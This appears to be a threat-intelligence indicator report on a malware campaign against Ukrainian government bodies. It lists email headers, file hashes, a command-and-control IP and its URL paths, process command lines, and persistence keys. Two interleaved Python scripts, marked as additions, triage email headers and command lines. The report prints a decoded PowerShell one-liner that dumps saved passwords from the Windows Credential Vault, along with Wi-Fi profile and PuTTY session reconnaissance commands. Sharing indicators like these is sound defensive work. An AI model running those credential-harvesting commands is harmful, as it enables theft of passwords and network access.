VRad

#elephant_hobot_280422

Apr 28th, 2022 (edited)
#IOC #OptiData #VR #Elephant #GrimPlant #GraphSteel #Hobot

https://pastebin.com/Z9PLqtpE

previous_contact: n/a

FAQ:
https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/
https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/
https://cert.gov.ua/article/39882
https://excelvba.ru/code/tools/Attachments
https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel
https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant

attack_vector
--------------
email > XLS > VBA > extract EXE1 (base64) > get EXE2 > get EXE3 > get EXE4 > exfil to 212.192.246.115


# # # # # # # #
email_headers
# # # # # # # #

Received: from mail3.nest.vn.ua ([193.243.158.20])
Received: from WINR8K088HRVJH (unknown [87.249.139.170]) by mail3.nest.vn.ua (Postfix) with ESMTPSA id F265D342979
From: "trembitskyy@vndsp.gov.ua" <trembitskyy@vndsp.gov.ua>
X-Mailer: Smart_Send_4_4_2
Date: Thu, 28 Apr 2022 01:46:40 +0300
Message-ID: <7304491317264122489710@WIN-R8K088HRVJH>
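The header lines above, parsed as an added example (this script is not part of the original paste): it assembles the paste's headers into a minimal message, walks the Received chain from the bottom up to find the originating hop, and records the points an analyst would note from these headers: a HELO name with no domain, no reverse DNS for the submitting host, a From domain unrelated to the server that accepted the submission, and a Message-ID whose right-hand side is not a domain. The message assembly, the parsing regex and the tag names are mine.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List

# Constructed sample: the header lines this paste lists, assembled into a minimal
# RFC 5322 message with no body. Header values are the paste's; the assembly is mine.
SAMPLE_MESSAGE = (
    "Received: from mail3.nest.vn.ua ([193.243.158.20])\n"
    "Received: from WINR8K088HRVJH (unknown [87.249.139.170]) by mail3.nest.vn.ua "
    "(Postfix) with ESMTPSA id F265D342979\n"
    'From: "trembitskyy@vndsp.gov.ua" <trembitskyy@vndsp.gov.ua>\n'
    "X-Mailer: Smart_Send_4_4_2\n"
    "Date: Thu, 28 Apr 2022 01:46:40 +0300\n"
    "Message-ID: <7304491317264122489710@WIN-R8K088HRVJH>\n"
    "\n"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# "from <helo> (<rdns> [ip]) by <host> ..." as Postfix and most MTAs write it
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)(?:\s+\((?P<rdns>[^)]*)\))?(?:.*?\bby\s+(?P<by>\S+))?",
    re.IGNORECASE | re.DOTALL,
)


def parse_received(value: str) -> Dict[str, object]:
    """Pull HELO name, reverse-DNS field, IPs and receiving host out of one Received header."""
    m = RECEIVED_RE.search(value)
    rdns = (m.group("rdns") or "") if m else ""
    return {
        "helo": m.group("helo") if m else "",
        "rdns": rdns.split()[0] if rdns else "",   # "unknown [ip]" -> "unknown"
        "ips": IPV4_RE.findall(value),
        "by": (m.group("by") or "") if m else "",
    }


def analyze(raw_message: str) -> Dict[str, object]:
    """Return the originating IP and a list of finding tags for the message headers."""
    msg = message_from_string(raw_message)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    findings: List[str] = []
    if not hops:
        return {"origin_ip": None, "findings": ["no-received-headers"]}
    # Received headers are prepended by each MTA, so the last one is the first hop.
    origin = hops[-1]
    origin_ip = origin["ips"][0] if origin["ips"] else None
    if "." not in origin["helo"]:
        findings.append("non-fqdn-helo")
    if origin["rdns"].lower() == "unknown":
        findings.append("no-rdns")
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    submit_host = origin["by"].lower()
    if from_domain and submit_host and not submit_host.endswith(from_domain):
        findings.append("sender-domain-relay-mismatch")
    mid_host = msg.get("Message-ID", "").strip().strip("<>").rpartition("@")[2]
    if "." not in mid_host:
        findings.append("non-fqdn-message-id")
    if msg.get("X-Mailer"):
        # Surfaced as a pivot for hunting, not judged here.
        findings.append("x-mailer:" + msg["X-Mailer"].strip())
    return {"origin_ip": origin_ip, "findings": findings}


if __name__ == "__main__":
    result = analyze(SAMPLE_MESSAGE)
    print("origin:", result["origin_ip"])
    for tag in result["findings"]:
        print(" -", tag)
```

The relay mismatch is a lead, not proof: legitimate mail sent through a provider's relay shows the same shape, so pair it with the SPF, DKIM and DMARC results, which these headers do not include. The originating IP is the value to pivot on in mail logs, alongside the X-Mailer string.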


# # # # # # # #
files
# # # # # # # #

SHA-256 8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b First Submission 2022-04-26 07:12:50 UTC
File name Aid request COVID-19-04_5_22--.xls [ MS Excel Spreadsheet + SheetForAttachedFiles]
File size 9.44 MB (9897472 bytes)

SHA-256 ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69 First Submission 2022-04-26 07:37:22 UTC
File name base_update.exe _dropper_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
File size 4.29 MB (4499408 bytes)

SHA-256 f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41 First Submission 2022-04-22 15:49:06 UTC
File name java-sdk.exe _downloader_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
File size 5.90 MB (6191616 bytes)

SHA-256 aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79 First Submission 2022-04-26 07:53:56 UTC
File name oracle-java.exe _implant_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
File size 9.55 MB (10016256 bytes)

SHA-256 47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878 First Submission 2022-04-24 14:03:56 UTC
File name microsoft-cortana.exe _client_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
File size 9.04 MB (9481728 bytes)


# # # # # # # #
activity
# # # # # # # #

PL_SCR 212.192.246.115/i - get downloader java-sdk.exe
212.192.246.115/p - get implant oracle-java.exe
212.192.246.115/m - get client microsoft-cortana.exe

C2 212.192.246.115/c


netwrk
--------------
212.192.246.115 212.192.246.115:443 443 HTTP GET /i HTTP/1.1 -hobot-
212.192.246.115 212.192.246.115:443 443 HTTP GET /p HTTP/1.1 -hobot-
212.192.246.115 212.192.246.115:443 443 HTTP GET /m HTTP/1.1 -hobot-

3.220.57.224 api.ipify.org 443 TLSv1 Client Hello

212.192.246.115 212.192.246.115:443 443 HTTP GET /c HTTP/1.1 -hobot-


comp
--------------
base_update.exe 2952 212.192.246.115 443 ESTABLISHED
java-sdk.exe 3684 212.192.246.115 443 ESTABLISHED
oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
oracle-java.exe 1088 3.220.57.224 443 ESTABLISHED
microsoft-cortana.exe 1412 212.192.246.115 443 ESTABLISHED
microsoft-cortana.exe 1412 3.220.57.224 443 ESTABLISHED
oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED


proc
--------------
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\tmp\base_update.exe
C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
C:\Users\operator/.java-sdk/oracle-java.exe -addr YdlP+kKrV+icT7cT1PCcwA==
C:\Users\operator/.java-sdk/microsoft-cortana.exe -addr YdlP+kKrV+icT7cT1PCcwA==
C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles
C:\Windows\system32\netsh.exe wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXA...
C:\Windows\system32\cmd.exe /Q /C powershell reg query HKCU\Software\SimonTatham\Putty\Sessions
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe reg query HKCU\Software\SimonTatham\Putty\Sessions
C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions
. . .

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28.04.2022 16:24
Java-SDK c:\users\operator\.java-sdk\java-sdk.exe 01.01.1970 3:00
C:\Users\operator\.java-sdk\java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==


drop
--------------
%tmp%\base_update.exe
%tmp%\prefix954622903
%tmp%\prefix...

C:\Users\%user%\.java-sdk\java-sdk.exe
C:\Users\%user%\.java-sdk\microsoft-cortana.exe
C:\Users\%user%\.java-sdk\oracle-java.exe


# # # # # # # #
additional info
# # # # # # # #

xls metadata
--------------
File Name : Aid request COVID-19-04_5_22--.xls
Directory : .
File Size : 9.4 MiB
File Modification Date/Time : 2022:04:28 09:35:09+03:00
File Access Date/Time : 2022:04:28 16:22:14+03:00
File Inode Change Date/Time : 2022:04:28 16:22:05+03:00
File Permissions : -rw-rw-r--
File Type : XLS
File Type Extension : xls
MIME Type : application/vnd.ms-excel
Title :
Subject :
Author : Apache POI
Comments :
Template :
Last Modified By : Пользователь
Revision Number : 1
Software : Microsoft Excel
Total Edit Time : 1.0 minutes
Create Date : 2020:04:30 13:56:23
Modify Date : 2022:04:21 18:56:05
Security : Password protected
App Version : 16.0000
Scale Crop : No
Links Up To Date : No
Shared Doc : No
Hyperlinks Changed : No
Title Of Parts : All request, Ministry of Defense, Updating data, Ministry of Economy, Ministry of Education%Science, Ministry of Energy&Environment, Ministry of Finance, Ministry of Health, Ministry of Infrastructure, Ministry of Internal Affairs, Ministry of Justice, Ministry of Reintegration, Ministry of Social Policy, National Guard, National Police, State Audit Service, State Border Guard Service, State Customs Service, State Emergency Service, State Fiscal Service, State Security Service, State Service of Special Commun, State Service for Geodesy, State Tax Service
Heading Pairs : Листы, 24
Code Page : Windows Cyrillic
Direction : EngRus**
Translated : -1
Comp Obj User Type Len : 27
Comp Obj User Type : Microsoft Excel 2003


powershell decoded & deobfuscated
----------------------------------
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders
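Triage of the process command lines from the proc section, together with the decoding step that turns the `-encodedCommand` argument into the PowerShell shown above, as an added example (this script is not part of the original paste). It decodes the base64-over-UTF-16LE argument that powershell.exe expects, then tags each line that matches a step of this chain: the wlan profile enumeration, the PuTTY session registry query, executables run from the `.java-sdk` directory, and decoded PowerShell that touches the Windows Credential Vault. The sample command lines are constructed from the proc section; the encoded argument is rebuilt from the first clause of the decoded command (the paste shows only its truncated prefix), and the tag names and regexes are mine.

```python
import base64
import re
from typing import List, Optional, Tuple

# First clause of the decoded PowerShell listed in this paste; used to rebuild a
# complete -encodedCommand argument so the decoder can be exercised offline.
PS_CLAUSE = ("[void][Windows.Security.Credentials.PasswordVault,"
             "Windows.Security.Credentials,ContentType=WindowsRuntime]")


def encode_powershell(command: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample command lines, modelled on the proc section of this paste.
SAMPLE_CMDLINES = [
    r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
    r"C:\tmp\base_update.exe",
    r"C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==",
    r"C:\Users\operator/.java-sdk/oracle-java.exe -addr YdlP+kKrV+icT7cT1PCcwA==",
    r"C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand "
    + encode_powershell(PS_CLAUSE),
    r"C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions",
    r"C:\Windows\system32\notepad.exe C:\Users\operator\notes.txt",  # benign control line
]

# powershell.exe accepts abbreviated forms of -EncodedCommand; the common ones are listed.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)

# Plain-text patterns taken from the proc section: (tag, regex)
CHECKS: List[Tuple[str, re.Pattern]] = [
    ("wifi-profile-discovery", re.compile(r"netsh\s+wlan\s+show\s+profiles", re.I)),
    ("putty-session-discovery", re.compile(r"SimonTatham\\Putty\\Sessions", re.I)),
    ("java-sdk-implant-path", re.compile(r"[\\/]\.java-sdk[\\/]", re.I)),
]
# Strings that mark Credential Vault access once the PowerShell is decoded.
VAULT_MARKERS = ("PasswordVault", "RetrievePassword")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind a -encodedCommand argument, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped base64 padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:                      # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def triage(cmdline: str) -> List[str]:
    """Tags for one command line; an empty list means nothing from this chain matched."""
    tags = [tag for tag, rx in CHECKS if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded-powershell")
        if any(marker in decoded for marker in VAULT_MARKERS):
            tags.append("credential-vault-access")
    return tags


def triage_all(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Keep only the command lines that produced at least one tag."""
    hits = []
    for cmdline in cmdlines:
        tags = triage(cmdline)
        if tags:
            hits.append((cmdline, tags))
    return hits


if __name__ == "__main__":
    for cmdline, tags in triage_all(SAMPLE_CMDLINES):
        print(", ".join(tags), "<-", cmdline[:72])
```

Run over Sysmon event 1 or 4688 command lines, the decode step is what makes the credential-vault check possible at all; the plain-text checks on their own would only see a powershell.exe launch. The `-a`/`-addr` argument of the `.java-sdk` executables is also base64 (16 bytes when decoded) but is left uninterpreted here, since the paste does not say what it encodes.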


# # # # # # # #
VT & Intezer
# # # # # # # #

Dropped files
**************
https://www.virustotal.com/gui/file/8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b/details
https://www.virustotal.com/gui/file/ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69/details
https://analyze.intezer.com/analyses/7352b66e-04e6-4b8a-b0b6-97443570103e
https://www.virustotal.com/gui/file/f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41/details
https://analyze.intezer.com/analyses/113ed91f-51cf-4a7d-abc7-d4a61e03bf03
https://www.virustotal.com/gui/file/aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79/details
https://analyze.intezer.com/analyses/4662ac0b-a3a2-4259-86c9-875739feb102
https://www.virustotal.com/gui/file/47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878/details
https://analyze.intezer.com/analyses/ae7a608e-c54c-4e19-a2fb-c217646c4e3b

PL_SCR
**************
https://www.virustotal.com/gui/ip-address/212.192.246.115/details

C2
**************
https://www.virustotal.com/gui/ip-address/212.192.246.115/details

VR